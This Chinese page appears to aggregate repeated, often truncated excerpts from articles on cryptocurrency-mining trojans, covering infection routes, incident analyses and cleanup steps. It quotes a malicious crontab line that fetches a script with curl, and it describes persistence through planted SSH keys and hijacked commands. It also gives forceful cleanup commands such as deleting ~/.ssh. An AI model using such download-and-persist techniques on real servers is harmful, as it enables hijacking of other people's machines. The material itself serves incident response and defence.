一分钟了解什么是挖矿木马 什么是挖矿木马?...攻击者通过各种手段将挖矿程序植入受害者的计算机中,在受害者不知情的情况下利用其计算机的云算力进行挖矿,从而获取利益,这类非法植入用户计算机的挖矿程序就是挖矿木马。 挖矿木马,挖的是啥?...挖矿木马自查 挖矿木马自查 发现挖矿 CPU使用率 通常对挖矿木马的感知,主要表现在主机的使用感上,在主机正常运行的情况下,突然变得卡顿,并且CPU的使用率高于正常使用时的数值或达到了100%: 感知产品...网页挖矿 网页挖矿是指攻击者将挖矿木马植入正常网站,只要访问者通过浏览器浏览被恶意植入了网页挖矿木马站点,浏览器会即刻执行挖矿指令。...定期对系统进行漏洞扫描,及时修复漏洞,特别是挖矿木马常用的“永恒之蓝”漏洞; 2. Web服务器要及时更新组件,安装软件补丁; 3. 对于数据库要及时更新数据库管理软件补丁。
,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行攻击网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行攻击脚本,注入挖矿木马,...这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。 ?...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,被挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP
排查过程 我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接被 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul 过去是下面的脚本,过程就是在挖矿: ? 有兴趣的同学想查看以上完整源代码,命令行运行下面指令(不分操作系统,方便安全无污染): ?...等等,这远远不够,考虑到能被拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...遇到挖矿木马最好的解决方式:将主机镜像、找出病毒木马、分析入侵原因、检查业务程序、重装系统、修复漏洞、再重新部署系统。
,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行攻击网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行攻击脚本,注入挖矿木马,...这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,被挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP
什么是挖矿木马 挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。...部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。整体的攻击流程大致如下图所示: 1.png 二....top -c 3.png 如果您的主机CPU占用率居高不下,那么主机很有可能已经被植入了挖矿木马,会影响服务器上的其他应用的正常运行,需要立刻上机排查。 三. 清理挖矿木马 1....阻断异常网络通信 挖矿木马不仅会连接矿池,还有可能会连接黑客的C2服务器,接收并执行C2指令、投递其他恶意木马,所以需要及时进行网络阻断。...清除计划任务 大部分挖矿木马会通过在受感染主机中写入计划任务实现持久化,如果仅仅只是清除挖矿进程,无法将其根除,到了预设的时间点,系统会通过计划任务从黑客的C2服务器重新下载并执行挖矿木马。
什么是挖矿木马 挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。...部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。整体的攻击流程大致如下图所示: 二....top -c 如果您的主机CPU占用率居高不下,那么主机很有可能已经被植入了挖矿木马,会影响服务器上的其他应用的正常运行,需要立刻上机排查。 三....-j DROP 清除计划任务 大部分挖矿木马会通过在受感染主机中写入计划任务实现持久化,如果仅仅只是清除挖矿进程,无法将其根除,到了预设的时间点,系统会通过计划任务从黑客的C2服务器重新下载并执行挖矿木马...清除SSH公钥 挖矿木马通常还会在~/.ssh/authoruzed_keys文件中写入黑客的SSH公钥,这样子就算用户将挖矿木马清除得一干二净,黑客还是可以免密登陆该主机,这也是常见的保持服务器控制权的手段
XMR(门罗币)是目前比特币等电子货币的一种,以其匿名性,支持CPU挖矿,以及不菲的价格等特点,得到了“黑产”的青睐。瀚思科技挖掘出黑产利用互联网服务器进行挖矿的通用模式,以及多个挖矿后台更新服务器。...攻击和挖矿方式显示黑产组织在相互竞争、木马更新等方面较去年又上了一个台阶。 ? 门罗币价格走势图 事件描述 近日,黑客利用SSH暴力破解服务器后种植挖矿木马,我们追踪到了其多个后台更新服务器。...黑客攻击服务器与种植挖矿木马过程包括三个步骤: 1. 攻击者探测SSH服务 2. 攻击者对SSH服务账户和密码进行暴力破解 3....一旦暴力破解成功,攻击者远程下载并运行挖矿程序 下图是一个挖矿木马后台服务器的截图,从图中可以看出116.196.120.20这台服务器从2018年1月26日14点开始,xm.sh(下载器程序)已经被下载过...挖矿黑客之间的竞争愈发激烈 对比之前发现的同类型挖矿木马,本次发现的挖矿木马在代码上已经有了进一步的提升,之前发现的挖矿脚本,主要杀掉具体进程名,目前主要根据矿池信息杀掉挖矿进程,扩大了有效范围。
No.3 挖矿木马分析结果 阶段1 1.关闭防火墙和selinux。...从这个阶段开始分析服务器中存在的另外一个挖矿脚本,可以看出本人通过crontab -r 后任然无法删除定时任务,这里可能有两种原因: 1.有其他定时任务还在不断写入下载挖矿脚本的命令。...2.系统命令和系统进程被劫持,一旦被劫持的系统进程或命令生效,挖矿木马再次激活。 ?...通过busybox尝试恢复被劫持的系统命令和进程后,重启服务器,重新登录服务器后依然有病毒进程被拉起,怀疑登录时加载的服务存在问题,最后终于发现/etc/bashrc 存在挖矿木马下载命令。 ?...结合挖矿木马的特性,可达到不死马的效果。 END
1 事件回顾 1.1 发现异常 IDS日志巡检中发现一条连接矿池服务器的日志,按照以往的经验,看来又有一台服务器沦为矿机了。...经查,这台主机是Atlassian confluence服务器,目前版本是V7.5.1,对外开通80和443端口。...所以排查的思路分两方面:排查是否有已知漏洞;找到木马程序及时清理。...2 排查步骤 2.1服务器漏洞扫描 漏扫结果发现两个漏洞,其中一个是nginx任意代码执行漏洞,需升级到最新版可以解决,立即完成升级并重启服务;另一个是jira相关漏洞,不过该漏洞是DDoS漏洞,与本次被中木马应该关系不大...2.8 死灰复燃 9月6日(周一)一大早到单位先巡检一遍安全设备,发现confluence服务器又中木马了,而且这回威胁事件也多了,包括DDoS、矿池连接、公共矿池、恶意软件和僵尸网络,查看关联实体高达
1.png 二、安全分析 1、隐藏进程 经过busybox核实到存在隐藏进程,百度核实为挖矿病毒 2.png 2、crontab 存在异常任务 3.png 下载链接已经失效,IP为海外。...4.png 3、进程文件并不存在 5.png 明显该木马在运行成功后,会自动清理运行文件。 4、文件dump出来核实是否为木马 6.png Virustotal 中核实文件是否异常。...gmcq.361yx.cn//g" /etc/hosts #解除加载异常动态库 > /etc/ld.so.preload #删除异常动态库 rm -fr /etc/libsystem.so #清除木马病毒
https://blog.csdn.net/huyuyang6688/article/details/78994909 背景 ---- 利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢...,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,于是赶紧采取办法~ ?...木马来历 ---- 最后说下,这个木马是怎么进来的呢,查了一下原来是利用Redis端口漏洞进来的,它可以对未授权访问redis的服务器登录,定时下载并执行脚本,脚本下载imWBR1和ddg文件并运行,imWBR1...挖矿,ddg进行系统监控、远程调用、内网传播等。...参考文章: 1、清除wnTKYg 这个挖矿工木马的过程讲述 2、比特币挖矿木马Ddg分析 【 转载请注明出处——胡玉洋《记一次服务器被挖矿木马攻击的经历》】
很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...对服务器的启动项进行检查,有些服务器被植入木马后门,即使重启服务器也还是被攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。...再一个要检查的地方是服务器的历史命令,history很多服务器被黑都会留下痕迹,比如SSH登录服务器后,攻击者对服务器进行了操作,执行了那些恶意命令都可以通过history查询的到,有没有使用wget命令下载木马...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https...有些服务器被黑后,请立即检查2天里被修改的文件,可以通过find命令去检查所有的文件,看是否有木马后门文件,如果有可以确定服务器被黑了。
腾讯电脑管家近日捕获的HSR币挖矿木马,隐藏在“绝地求生”辅助程序中,而由于“绝地求生”对电脑性能要求较高,不法分子瞄准”绝地求生”玩家电脑,相当于找到了“绝佳”的挖矿机器。...这是一份木马的进程检查黑名单,大部分是安全类软件,如果本机有以下进程在运行,则提示用户关闭或卸载这些软件。 ? 辅助主界面: ? 辅助开启后,从服务器拉取配置文件,目前已知该辅助有3个服务器: ?...拉取完辅助配置文件,会从服务器拉取挖矿程序pubghsr.exe。 ? 下载成功后Pubghsr被释放在c:\windows\system\wininit.exe,并设置为开机启动。...目前该挖矿木马专门挖取HSR币,以目前的交易价格,1算力每天可获得人民币2.014元。 ?...0x4 安全建议 1、 开启系统自动更新,及时打补丁,防止恶意木马利用; 2、 服务器避免使用弱口令,不给不法分子可乘之机; 3、 机器卡慢时应立即查看CPU使用情况,若发现可疑进程可及时关闭; 4、
WGCLOUD是一款优秀的服务器运维监测软件,可以说是运维人员的必备工具,它部署操作简单方便,性能优秀,不占资源,稳定安全场景一:有时候我们的服务器容易被植入挖矿病毒软件,工程师很难及时发现和处理,这里...WGCLOUD就可以大展身手了WGCLOUD就可以解决这个问题,它可以监测服务器上的异常运行进程,其中就包括挖矿软件,如果发现某个进程持续占用cpu或内存资源,就会提示,并可以在页面手动结束这些木马进程如下图
腾讯电脑管家近日捕获的HSR币挖矿木马,隐藏在“绝地求生”辅助程序中,而由于“绝地求生”对电脑性能要求较高,不法分子瞄准”绝地求生”玩家电脑,相当于找到了“绝佳”的挖矿机器。...辅助开启后,从服务器拉取配置文件,目前已知该辅助有3个服务器: ? 下载后解压文件,是辅助的一些功能配置文件。 ? 拉取完辅助配置文件,会从服务器拉取挖矿程序pubghsr.exe。...目前该挖矿木马专门挖取HSR币,以目前的交易价格,1算力每天可获得人民币2.014元。 ?...从传播趋势看,该木马从12月8号开始影响用户机器,并在12月20号达到最高峰值,仅20号当天就有近20万台机器受到该挖矿木马影响。 ? 该辅助程序在12月22日晚宣布停用。 ?...0×4 安全建议 1、 开启系统自动更新,及时打补丁,防止恶意木马利用; 2、 服务器避免使用弱口令,不给不法分子可乘之机; 3、 机器卡慢时应立即查看CPU使用情况,若发现可疑进程可及时关闭;
公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助。...# 防止木马再次下载 echo '127.0.0.1 pastebin.com' >> /etc/hosts # 删除掉局域网服务器之间的免密登录 # 本机定时任务和木马都清理干净了,重启后木马又重新执行...,最后发现是因为局域网服务器免密登录造成的,木马会通过免密登录互相复制。...rm -rf ~/.ssh # 先 kill 掉木马进程,不然服务器操作起来极慢 ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill...sleep 10秒,判断是否与端口 13531 建立连接,如果没有则执行 downloadrunxm 函数,连接挖矿服务器。 预防 任何服务都要设置密码认证,且强密码。
腾讯安全御见威胁情报中心持续检测到,一款名为NovelMiner的挖矿木马自2017年9月开始隐藏在广告短链接中进行传播。...据统计,全球约有100多个国家超过1500万用户由于误点带毒广告页面而自动下载了NovelMiner挖矿木马。 ?...b.vbs负责下载并启动xmrig挖矿程序,木马常用VBS名及下载代码段: ? V1.0版木马攻击流程 ?...从pdb信息可以看出,该挖矿木马已经到了V3版本了,从作者机器名可以看出属于俄语区,“роаипроаип”英文译作“NovelNovel”,此木马取名为“NovelMiner”。...腾讯电脑管家提醒用户不要随意点开未知来源的陌生链接,电脑管家的“反挖矿防护”功能已覆盖电脑管家全版本用户,为用户拦截并预警各类挖矿木马程序和含有挖矿js脚本网页的运行,保持电脑管家运行状态即可对此类挖矿木马进行全面拦截
——网页“挖矿”,这种攻击会导致用户计算机资源被严重占用,而“挖矿”木马则乘机利用用户电脑疯狂敛财,一个僵尸网络从被攻击的用户的电脑中获利可超300万元人民币。...360信息安全专家表示,不同于通过入侵服务器搭建“挖矿”木马僵尸网络,网页“挖矿”脚本更容易被用户所察觉,但由于利益驱使,目前不法分子仍通过各种方法在一些网站中植入了“挖矿”脚本。...业内专家预计,由于网页“挖矿”隐蔽性较低,未来不法分子或会将“挖矿”目标转移到网页游戏和客户端游戏中,通过游戏的资源高消耗率掩盖“挖矿”机的运作。而移动平台也有可能是“挖矿”木马的重要目标。...许多“挖矿”木马僵尸网络利用“永恒之蓝”漏洞利用武器进行传播,由于大部分漏洞细节公布之前相应厂商已经推送相关补丁,服务器管理员能够及时为系统和相关服务打补丁就能有效避免漏洞利用攻击。...3.定期维护服务器。由于“挖矿”木马会持续驻留在计算机中,如果服务器管理员未定期查看服务器状态,那么“挖矿”木马就难以被发现。因此服务器管理员应定期维护服务器。
【背景】 服务器中了aliyun.one 挖矿木马 特点如下: 1、 crontab 中显示类似上面的任务,并且清理后又会出现。 2、 服务器负载高,CPU使用100%。...【木马源文件】 见附件 可以通过上面脚本分析执行的过程,从而找到清理该木马的方法 。 【清理】 注:以下操作如果删除不了或者修改不了 请执行 chattr –ia xx.xx 去掉只读属性。...xxx-x.x.so -f 四、停止sshservice服务 systemctl kill sshservice systemctl disable sshservice 五、busybox查看进程,杀掉挖矿进程和...由于没有清理干净或者漏洞,导致可能还会出现该木马,以及变异木马。...建议只开放需要的几个端口,如: ssh 登录 tcp 22端口 nginx WEB服务器 tcp 80 或者 自定的端口 mysql 服务器 限制IP访问 3306 redis 服务 限制IP访问 6379
新活跃挖矿木马家族偏好攻击Linux服务器 根据《报告》,DTLMiner、H2Miner和GuardMiner是2020年度排名前三的挖矿木马家族,此外z0Miner、SystemdMiner、WachtdogMiner...攻击者通过远程代码执行漏洞(RCE)可以直接向后台服务器远程注入操作系统命令或恶意代码,从而控制后台系统。WebLogic CVE-2019-2725是2020年挖矿木马最常利用的RCE漏洞。...具备僵尸网络特征的挖矿木马TOP3仍是DTLMiner、H2Miner、GuardMiner这些老牌僵尸网络,而2020年新活跃的挖矿木马家族以攻击Linux服务器居多。...挖矿木马不仅会导致服务器性能严重下降,影响服务器业务系统的正常运行,还有可能让服务器沦为黑客控制的肉鸡电脑,对其他目标发起攻击。...加强密码、授权验证、更新组件,三大措施抵御挖矿木马 针对日益猖獗的挖矿木马攻击,《报告》建议政企机构从多方面采取措施,保障服务器安全。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
